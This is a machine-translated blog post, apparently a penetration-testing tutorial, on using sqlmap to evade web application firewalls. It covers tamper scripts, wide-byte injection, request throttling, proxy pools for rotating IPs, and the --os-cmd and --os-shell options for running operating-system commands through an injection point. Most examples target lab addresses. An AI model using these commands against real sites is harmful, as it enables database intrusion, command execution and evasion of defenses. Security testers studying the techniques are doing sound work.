当前位置:网站首页>Sqlmap tutorial (IV) practical skills three: bypass the firewall
Sqlmap tutorial (IV) practical skills three: bypass the firewall
2022-07-07 07:15:00 【A τθ】
At present, many websites use waf Protect the website , During the penetration test , Many operations will be blocked , In the test SQL When the injection ,waf It will intercept the requested traffic ,
Lead to SQLMAP The requested content cannot reach the destination ,SQLMAP It is impossible to judge whether the target has injection ,waf Intercept malicious attack requests , Interception will be blacklisted , Cause attackers
Unable to access the target . Unable to perform security detection .
One 、 see temper modular
sqlmap --list-tamper

Two 、 Wide byte Injection
sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user



3、 ... and 、 Set the thread size
In case of waf When , If the concurrency is too large , Think of it as cc attack ,ip Will be blocked .
--threads=1 Set the thread to 1
Four 、 Set up http Request delay
--delay=DELAY Set each HTTP Requested delay seconds .
5、 ... and 、 Use proxy injection
sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 --proxy=http://192.168.1.107:4455



6、 ... and 、 Use proxy pool injection
After purchasing the agent pool , Get the proxy and save it to a file , such as :proxy.txt
123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730
--proxy-file Load the agent list from the file .
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt
7、 ... and 、sqlmap Command execution
--os-cmd=OSCMD Execute operating system commands
--os-shell Call up the interactive operating system shell
The current user of the injection point is dba when , Use the above two commands , One is to execute commands , One is to call the interactive operating system shell
1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"
2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
Use --os-shell The command will pop up an interaction shell The interface of , You can enter commands , If it can echo, it will return the information of command execution .
边栏推荐
- Can 7-day zero foundation prove HCIA? Huawei certification system learning path sharing
- jdbc数据库连接池使用问题
- Sqlserver multithreaded query problem
- Please tell me how to monitor multiple schemas and tables by listening to PgSQL
- .net core 访问不常见的静态文件类型(MIME 类型)
- Leetcode t1165: log analysis
- 请问 flinksql对接cdc时 如何实现计算某个字段update前后的差异 ?
- $parent (get parent component) and $root (get root component)
- 非父子组件的通信
- Libcurl returns curlcode description
猜你喜欢

$refs:组件中获取元素对象或者子组件实例:

Bus message bus

Apache AB stress test

2018 Jiangsu Vocational College skills competition vocational group "information security management and evaluation" competition assignment

mips uclibc 交叉编译ffmpeg,支持 G711A 编解码

Non empty verification of collection in SQL

. Net 5 fluentftp connection FTP failure problem: this operation is only allowed using a successfully authenticated context

Config distributed configuration center

Master-slave replication principle of MySQL

Le Service MySQL manque dans le service informatique
随机推荐
Multithreading and high concurrency (9) -- other synchronization components of AQS (semaphore, reentrantreadwritelock, exchanger)
ViewModelProvider. Of obsolete solution
Implementation of AVL tree
Take you to brush (niuke.com) C language hundred questions (the first day)
Leetcode t1165: log analysis
【JDBC以及内部类的讲解】
Basic process of network transmission using tcp/ip four layer model
Communication of components
Can 7-day zero foundation prove HCIA? Huawei certification system learning path sharing
Pass parent component to child component: props
Learning records on July 4, 2022
关于数据库数据转移的问题,求各位解答下
RuntimeError: CUDA error: CUBLAS_ STATUS_ ALLOC_ Failed when calling `cublascreate (handle) `problem solving
Hidden Markov model (HMM) learning notes
from . onnxruntime_ pybind11_ State Import * noqa ddddocr operation error
Multidisciplinary integration
Use of completable future
Basic introduction of JWT
The currently released SKU (sales specification) information contains words that are suspected to have nothing to do with baby
Abnova immunohistochemical service solution